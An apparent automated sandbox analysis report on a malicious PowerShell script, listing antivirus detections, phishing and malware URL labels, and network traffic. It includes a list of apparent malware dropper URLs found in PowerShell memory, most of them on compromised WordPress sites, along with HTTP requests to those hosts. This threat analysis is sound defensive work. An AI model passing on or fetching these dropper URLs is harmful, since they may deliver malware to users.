Source: http://etdog.com/wp-content/uploads/2020/12/Avira URL Cloud: Label: phishing
Source: http://etdog.com/wp-content/uploads/2020/12/footer-logo-1.pngAvira URL Cloud: Label: phishing
Source: http://etdog.comAvira URL Cloud: Label: phishing
Source: https://www.stmarouns.nsw.edu.au/paypal/b8G/Avira URL Cloud: Label: phishing
Source: http://etdog.com/wp-content/themes/pandaminer/static/swiper/css/swiper.min.cssAvira URL Cloud: Label: phishing
Source: http://etdog.com/index.php/wp-json/Avira URL Cloud: Label: phishing
Source: http://etdog.com/wp-content/uploads/2020/12/2-2.png)Avira URL Cloud: Label: phishing
Source: http://en.etdog.com/Avira URL Cloud: Label: phishing
Source: http://etdog.com/index.php/%e5%85%b3%e4%ba%8e/Avira URL Cloud: Label: phishing
Source: https://mikegeerinck.com/c/YYsa/Avira URL Cloud: Label: malware
Source: http://www.stmarouns.nsw.edu.au/paypal/b8G/Avira URL Cloud: Label: malware
Source: http://etdog.com/wp-content/themes/pandaminer/static/js/analytics.jsAvira URL Cloud: Label: phishing
Source: https://www.hintup.com.br/wp-content/dE/Avira URL Cloud: Label: phishing
Source: http://etdog.com/wp-content/themes/pandaminer/static/layer/layer.jsAvira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URLShow sources
Source: wm.mcdevelop.netVirustotal: Detection: 6%Perma Link
Source: etdog.comVirustotal: Detection: 9%Perma Link
Source: freelancerwebdesignerhyderabad.comVirustotal: Detection: 5%Perma Link
Source: www.hintup.com.brVirustotal: Detection: 8%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: ps_script.ps1Virustotal: Detection: 8%Perma Link
Source: unknownHTTPS traffic detected: 35.214.199.246:443 -> 192.168.2.3:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.223.27:443 -> 192.168.2.3:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 143.204.98.64:443 -> 192.168.2.3:49740 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 216.127.164.209: -> 192.168.2.3:
Potential dropper URLs found in powershell memoryShow sources
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in memory: <script type="application/ld+json" class="yoast-schema-graph">{"
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in memory: context":"https://schema.org","
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in memory: graph":[{"
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in memory: type":"WebSite","
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in memory: id":"https://mikegeerinck.com/#website","url":"https://mikegeerinck.com/","name":"Mike Geerinck \ud83d\udd25 Direct-Response Marketing","description":"Scale Your Business Predictable","potentialAction":[{"
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in memory: type":"SearchAction","target":"https://mikegeerinck.com/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"en-US"}]}</script>
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in memory:
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in memory: font-face{font-family:eicons;src:url(https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src:url(https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0#iefix) format("embedded-opentype"),url(https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0) format("woff2"),url(https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0) format("woff"),url(https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0) format("truetype"),url(https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eicon) format("svg");font-weight:400;font-style:normal}
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in memory: https://admintk.com/wp-admin/L/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in memory: https://mikegeerinck.com/c/YYsa/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in memory: http://freelancerwebdesignerhyderabad.com/cgi-bin/S/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in memory: http://etdog.com/wp-content/nu/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in memory: https://www.hintup.com.br/wp-content/dE/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in memory: http://www.stmarouns.nsw.edu.au/paypal/b8G/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in memory: http://wm.mcdevelop.net/content/6F2gd/
Source: global trafficHTTP traffic detected: GET /cgi-bin/S/ HTTP/1.1Host: freelancerwebdesignerhyderabad.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/nu/ HTTP/1.1Host: etdog.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /paypal/b8G/ HTTP/1.1Host: www.stmarouns.nsw.edu.auConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /content/6F2gd/ HTTP/1.1Host: wm.mcdevelop.netConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 162.241.148.243 162.241.148.243
Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /cgi-bin/S/ HTTP/1.1Host: freelancerwebdesignerhyderabad.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/nu/ HTTP/1.1Host: etdog.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /paypal/b8G/ HTTP/1.1Host: www.stmarouns.nsw.edu.auConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /content/6F2gd/ HTTP/1.1Host: wm.mcdevelop.netConnection: Keep-Alive
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: <a data-v-6ccbd8c6="" href="https://www.facebook.com/" equals www.facebook.com (Facebook)
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook elementor-repeater-item-49231b1" href="https://www.facebook.com/Mikegeerinck1/" target="_blank"> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-129de04" href="https://www.youtube.com/channel/UCezyOaog07qIo-EMB_zABkw?view_as=subscriber" target="_blank"> equals www.youtube.com (Youtube)
Source: A69S.dll.2.drString found in binary or memory: src="https://www.facebook.com/tr?id=406116357357499&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
Source: unknownDNS traffic detected: queries for: admintk.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 May 2021 13:54:01 GMTServer: nginx/1.19.10Content-Type: text/htmlContent-Length: 583Last-Modified: Thu, 25 Feb 2021 17:54:10 GMTVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmpString found in binary or memory: http://admintk.com
Source: powershell.exe, 00000002.00000002.324350205.000001B627EBD000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
Source: powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
Source: powershell.exe, 00000000.00000003.328948448.00000199C97B8000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.324317639.000001B627E6F000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
Source: powershell.exe, 00000002.00000002.324350205.000001B627EBD000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: powershell.exe, 00000002.00000002.324350205.000001B627EBD000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 00000002.00000002.324350205.000001B627EBD000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
Source: powershell.exe, 00000002.00000002.324555502.000001B627FFA000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: powershell.exe, 00000002.00000003.272680165.000001B6280C5000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab7
Source: powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9c5d727f110d3
Source: powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabs
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://en.etdog.com/
Source: powershell.exe, 00000002.00000002.323111990.000001B61115B000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/index.php/%e4%bb%a3%e7%90%86%e4%bf%a1%e6%81%af/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/index.php/%e5%85%b3%e4%ba%8e/
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/index.php/%e6%89%98%e7%ae%a1/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/index.php/%e7%
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/index.php/%e7%0
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/index.php/%e7%9f%bf%e6%9c%ba/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/index.php/2020/12/03/faq
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/index.php/wp-json/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/wp-content/nu/
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/wp-content/themes/pandaminer/static/css/app.css
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/wp-content/themes/pandaminer/static/js/analytics.js
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/wp-content/themes/pandaminer/static/js/jquery.min.js
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/wp-content/themes/pandaminer/static/js/manifest.js
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/wp-content/themes/pandaminer/static/js/work.js
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/wp-content/themes/pandaminer/static/layer/layer.js
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/wp-content/themes/pandaminer/static/swiper/css/swiper.min.css
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/wp-content/themes/pandaminer/static/swiper/js/swiper.min.js
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/wp-content/uploads/2020/12/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/wp-content/uploads/2020/12/1-2.png)
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/wp-content/uploads/2020/12/2-2.png)
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/wp-content/uploads/2020/12/3-1.png)
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/wp-content/uploads/2020/12/footer-logo-1.png
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://etdog.com/wp-content/uploads/2020/12/gg.jpg
Source: powershell.exe, 00000002.00000002.323111990.000001B61115B000.00000004.00000001.sdmpString found in binary or memory: http://etdog.comx
Source: powershell.exe, 00000002.00000002.323080629.000001B61112D000.00000004.00000001.sdmpString found in binary or memory: http://freelancerwebdesignerhyderabad.com
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in binary or memory: http://freelancerwebdesignerhyderabad.com/cgi-bin/S/
Source: powershell.exe, 00000002.00000002.323080629.000001B61112D000.00000004.00000001.sdmpString found in binary or memory: http://freelancerwebdesignerhyderabad.comx
Source: powershell.exe, 00000002.00000002.322999232.000001B6110BA000.00000004.00000001.sdmpString found in binary or memory: http://mikegeerinck.com
Source: powershell.exe, 00000002.00000002.323873864.000001B61FE53000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpString found in binary or memory: http://o.ss2.us/0
Source: powershell.exe, 00000002.00000002.324350205.000001B627EBD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000002.00000002.324350205.000001B627EBD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: http://olympiasoft.io
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: http://olympiasoft.io/
Source: powershell.exe, 00000002.00000002.319033051.000001B610004000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/01
Source: powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpString found in binary or memory: http://s.ss2.us/r.crl0
Source: powershell.exe, 00000000.00000002.332217824.00000199B17A1000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.318767737.000001B60FDF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.323427840.000001B6112CA000.00000004.00000001.sdmpString found in binary or memory: http://wm.mcdevelop.net
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in binary or memory: http://wm.mcdevelop.net/content/6F2gd/
Source: powershell.exe, 00000002.00000002.323427840.000001B6112CA000.00000004.00000001.sdmpString found in binary or memory: http://wm.mcdevelop.netx
Source: powershell.exe, 00000002.00000002.319033051.000001B610004000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.324350205.000001B627EBD000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
Source: powershell.exe, 00000002.00000002.323147364.000001B6111A0000.00000004.00000001.sdmpString found in binary or memory: http://www.hintup.com.br
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://www.kompoz.eu/
Source: powershell.exe, 00000002.00000002.323384618.000001B611293000.00000004.00000001.sdmpString found in binary or memory: http://www.stmarouns.nsw.edu.au
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in binary or memory: http://www.stmarouns.nsw.edu.au/paypal/b8G/
Source: powershell.exe, 00000002.00000002.323384618.000001B611293000.00000004.00000001.sdmpString found in binary or memory: http://www.stmarouns.nsw.edu.aux
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://www.turkeyporn.online/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://www.turkishporn.mobi/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://www.turkishporn.pro/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://www.turkishpornmovies.eu/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://www.turkishporno.mobi/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://www.turkishporno.online/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://www.turkishporno.pro/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://www.turkishpornography.eu/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://www.turkishporntube.online/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://www.turkishsex.eu/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://www.turkishsex.online/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://www.turkishsex.pro/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://www.turkishxxx.online/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: http://www.turkishxxxvideos.eu/
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpString found in binary or memory: http://x.ss2.us/x.cer0&
Source: powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmpString found in binary or memory: http://x1.c.lencr.org/0
Source: 2D85F72862B55C4EADD9E66E06947F3D.2.drString found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmpString found in binary or memory: http://x1.i.lencr.org/0
Source: powershell.exe, 00000002.00000002.324658342.000001B628066000.00000004.00000001.sdmpString found in binary or memory: http://x1.i.lencr.org/2
Source: powershell.exe, 00000002.00000002.322633813.000001B61101C000.00000004.00000001.sdmpString found in binary or memory: https://admintk.com
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in binary or memory: https://admintk.com/wp-admin/L/
Source: powershell.exe, 00000002.00000002.322633813.000001B61101C000.00000004.00000001.sdmpString found in binary or memory: https://admintk.comx
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: https://api.w.org/
Source: A69S.dll.2.drString found in binary or memory: https://api.whatsapp.com/send?phone=5519995088264&text=Gostaria%20de%20mais%20detalhes
Source: A69S.dll.2.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: powershell.exe, 00000002.00000002.323873864.000001B61FE53000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.323873864.000001B61FE53000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.323873864.000001B61FE53000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://dream-media.net
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://dream-media.net/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://dream-media.net/client-accelerator-method/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://e-proposals.io/
Source: A69S.dll.2.drString found in binary or memory: https://fonts.googleapis.com/css?family=Product
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
Source: powershell.exe, 00000002.00000002.319033051.000001B610004000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://gmpg.org/xfn/11
Source: A69S.dll.2.drString found in binary or memory: https://hintup.io
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.322999232.000001B6110BA000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/#website
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/30-min-strategy-session/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/?s=
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/about-me/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/blog/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/c/YYsa/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/comments/feed/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/contact/
